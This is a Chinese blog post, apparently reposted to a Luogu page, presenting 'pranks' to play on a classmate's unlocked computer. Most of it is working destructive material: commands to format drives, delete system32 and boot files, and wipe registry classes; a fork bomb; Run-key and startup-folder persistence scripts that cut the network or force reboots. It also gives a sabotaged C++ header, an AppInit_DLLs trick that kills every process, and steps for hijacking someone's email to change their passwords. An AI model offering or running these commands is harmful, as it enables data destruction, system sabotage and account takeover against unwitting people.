声明:本文完全搬运自这篇博客,因为洛谷国际站需要一些手段,所以就把它搬过来了。
如果您是版权方且这篇文章侵犯了您的权益,请联系我进行删除。
当你的同学忘了锁电脑时...
本文作者不对任何因使用本页代码而造成的悲剧/毒打/报复等负责。任何因以下行为造成的后果均与 本站/本人/版权说明中的原创者 无关。
版权说明
本文大部分内容均来自extmool's Blog & movetoex's Blog,博主做了部分修改。
Windows 指令篇
此篇命令均在 Windows10 专业工作站版 测试通过,其他系统请自测。
轻微毒瘤
关机
当你的朋友还有东西没有保存的时候,这个命令着实有效……
(可以在Win+R中输入,也可以在cmd中输入)
shutdown -f -s -t 0
(注释:-f表示强制关机而不提醒,-s表示关机,-t 0表示倒计时0秒)
干掉explorer
执行了这个命令后再Win+D效果更佳(Win+D可以使所有窗口最小化)
taskkill -f -im explorer.exe
或
ntsd -c q -pn explorer.exe
中度毒瘤
卡死电脑
extmool的原文中说可以在cmd中输入如下命令导致电脑卡死:
%0|%0
解决办法是:
taskkill -f -im cmd.exe
但是这个办法在我的电脑上并不能工作qwq
如果在你的电脑上可以工作,欢迎在本文末尾处留言~
重度毒瘤
格式化
当你的朋友习惯把东西存到非系统盘的时候……
注意,此命令只能在带有管理员权限的命令提示符窗口或Powershell中使用!
PS:如果不想核平解决的话,建议不要尝试
format D: /u /s
format E: /u /s
format F: /u /s
能通过那些恢复工具找回一部分
但是如果真的毒瘤的要死,可以帮他弄个37次随机覆写啥的……
清除分区
PS:墙裂建议不要尝试qwq
diskpart
list disk
select disk 0
list partition
然后随机挑选一个幸运分区进行格式化。
基本无解
干掉system32
这种方式...比格式化死得更惨
再次安全警告:下面这行代码很可能导致命案的发生,极度不建议使用!!!
del C:\windows\system32\*.dll /f /s /q
Windows 脚本篇
此篇命令均在 Windows Server 2008 R2 测试通过,其他系统请自测。
此篇所有命令需要写成 bat 文件运行
轻微毒瘤
蓝屏死机
@echo off
del %systemdrive%\*.*/f /s /q
shutdown -r -f -t 00
把文件后缀名改成exe
REN *.DOC *.EXE
REN *.JPEG *.EXE
REN *.LNK *.EXE
REN *.AVI *.EXE
REN *.MPEG *.EXE
REN *.COM *.EXE
REN *.BAT *.EXE
中度毒瘤
开机自动卡死(此部分的两小节均在 Windows10 专业版 测试通过)
开机自动打开所有开始菜单中的程序
打开C:\ProgramData\Microsoft\Windows\Start Menu\Programs,把所有里面的快捷方式丢到里面的“启动”文件夹里
开机自动打开无限循环窗口
Step 1. 在上面说的“启动”文件夹里新建start.cmd
Step 2. 写入如下内容:
taskkill -f -im explorer.exe && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd
(你想写多少个start test.cmd都可以)
Step 3. 在“启动”文件夹里新建test.cmd
Step 4. 写入如下内容:
start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd && start test.cmd
(同上,你想写多少个start test.cmd都可以)
PS:你可以随意修改start.cmd的名称,也可以修改test.cmd的名称,不过如果你修改test,需要把上面代码里的所有test全部改掉
Step 5. 重启!
删除system32
del c:\WINDOWS\system32\*.*/q
删除引导,使PC永久崩溃
哼!我就不让你启动!
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoesec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
PS:可以通过重装系统解决qwq
删除所有的注册表
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
重度毒瘤
永久禁用网络
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowawimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn.bat
PAUSE
一直按回车
Set wshShell=wscript.CreateObject("Wscript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
启动电脑后自动关机
Astremetflaved8
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentsoftversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat
PAUSE
极度毒瘤!!!
开启CD刻录机蜂鸣器
注意,这些命令可能会使您的耳朵崩溃
Set oWMP=CreateObject("WMPlayer.OCX.7")
Set colCDROMs=oWMP.cdrromcollection
do
if colCDROMs.Count >=1 then
For i=0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i=0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End if
wscript.sleep 100
loop
Linux 指令篇
由于不太常用,所以就不写过来了,直接贴地址:这里
账号篇
最常见的机惨手段,使用他人未锁定的账号进行以下操作:
发布如“我最强了”/“我tql”/“I AK IOI”
在QQ/TIM中一个会话右键,打开好友管理器,全选好友,点击删除按钮。不过目前没有找到一键退群,只能一个一个退了qwq
在某些网站中,可以不用输入原始密码就修改密码,不用我说了
如果他打开了QQ/TIM,或者他有邮箱,你就可以登录他的QQ邮箱(或者他的其它未锁定/退出的邮箱),然后大肆地瞎改他的密码。毕竟大部分账号都是靠邮箱来进行密码重置的~
Dev-C++篇
如果你的同学用的是Dev-C++,就有好戏看了~
工具->编译选项,勾选“在编译时加入以下命令”,然后输入--help,他就再也看不到编译结果了
工具->编辑器选项->语法,能调几个调几个,把所有代码标识符都调成和背景色一样
工具->环境选项,想改什么改什么,把程序语言改成某些你认不得的语言,把文件关联全取消勾选
工具->编译选项->目录,全删掉
魔改头文件篇
说实话...看了这篇你肯定会跃跃欲试的~
如果他打开了一份代码(或者你“帮”他打开了某一份代码),好戏开始
在Dev-C++中,你可以通过Ctrl+鼠标左击头文件来打开头文件,然后...
#ifndef _IOSTREAM // Check if
#include
#endif
#ifndef _CSTDILB_ //
#include
#endif
#ifndef _CTIME_ //
#include
#endif
#ifndef _QUEUE_
#include
#endif
// For input & output
#define freopen(file, mode, ptr) freopen(mode, file, ptr)
#define cin system("shutdown /h"); cin
#define cout system("ping 127.0.0.1 -t"); cout
#define printf(s, ...)
#define scanf(s, ...)
// For QRead & QWrite
#define putchar(c)
#define getchar() rand() % 10 + '0'
#define isdigit(i) (!(i >= '0' && i <= '9'))
// Others
#define sqrt(a) (a * a * a)
#define abs(i) ((i > 0) ? -i : i)
#undef int
#define int char
#define system(s)
// For C string operations
#define strlen(s) -1
#define strcmp(a, b) 1
#define strcat(a, b) memset(a, 0, sizeof(a)); memset(b, 0, sizeof(b));
// For keywords
#define if(x) srand((unsigned)time(0)); if (rand() < 500)
// For STL Containers
#define stack priority_queue
(来自MoveToEx的机惨头文件 https://movetoex.github.io/duliu/Programs/JC-Header.html)
把上面这一大堆代码丢到stdio.h或cstdio里面,把所有东西全部篡改。
比如如果他代码里出现了if(x)(x是某个变量),就会被改成随机数,然后如果随机数小于500qwq
再比如,int会被改成char,cin会被改成电脑休眠再cin,getchar会变成随机数字0~9,cout会被改成先ping一下localhost再cout...
也不用字符串了,全部被改了,无论字符串有多长都会返回-1,无论两个字符串有多么不同都会告诉你相同,一旦strcat就等于把两个字符串全部memset...
可以在机惨专用头文件页面进一步查看
真有意思
解决办法:安装或使用VS/VSC,我们有速览定义,不怕~
当然了,MinGW也是可以按照上面方式来修改的~
不过很显然,如果被机惨的人备份一遍编译器或者部分主要的头文件,就安全了。而且,实在不行了还可以使用某些在线IDE。
魔改其他文件篇
可以删除用户密码,用hexo博客的可以删掉所有文章再deploy一下,或者把别人的博客内容偷偷改一下保存(不deploy),这样没有site update的记录,除非有人一回电脑就git pull,否则一点痕迹也不留。
还可以把他桌面的快捷方式改一下,全部指向shutdown -p -f,再把图标该回去qwq
然而像我这样的人就可以免除改快捷方式的危害了,我几乎不用桌面的快捷方式,我从来都是用开始菜单的qwq 不过你也可以改开始菜单的啊qwq
魔改注册表篇
前面提到过删除所有注册表,不过显然那太容易被发现了qwq
然而,注册表是个好东西
不仅键值目录复杂的让人头疼
键值的意义也不好弄清
所以注册表可以拿来机惨用,不仅难以确定问题所在,还难以恢复
比如
Windows注册表有一个位置
这个位置下指定的DLL会在每一个载入了User32.dll的程序运行的时候载入并调用DllMain传入DLL_PROCESS_ATTACH
然后……
BOOL WINAPI DllMain(HINSTANCE hInstDll, DWORD fdwReason, PVOID fImpLoad) {
switch(fdwReason) {
case DLL_PROCESS_ATTACH: {
ExitProcess(0); // 退出进程
break;
}
default: {
break;
}
}
return 1;
}
至于这个位置在哪……
我不想说
我™真的不想说
不过作为一个乐于机惨别人的人(这话不是我说的,本片段取自MoveToEx的博客qwq)
还是分享出来吧
HEKY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\
这个位置下的AppInit_DLLs键的值指定一个或一组DLL的文件名,用 或,分隔。
LoadAppInit_DLLs为1的时候,AppInit_DLLs会被载入。
在VM试了一遍,确实能用,不过需要编译时指定运行方的Windows平台,否则会提示找不到vcruntime140.dll啥的……
然后就是control,cmd,taskkill一类的东西开启的时候都会加载那个链接库
酸爽的一批
倒也有解决方法
就是在U盘或者什么地方保存一份注册表的备份,并经常更新
PS: 一切问题的预防办法:走的时候把电脑锁上!!!(还可以顺带把网页账号和QQ/TIM什么的都锁上,以防万一)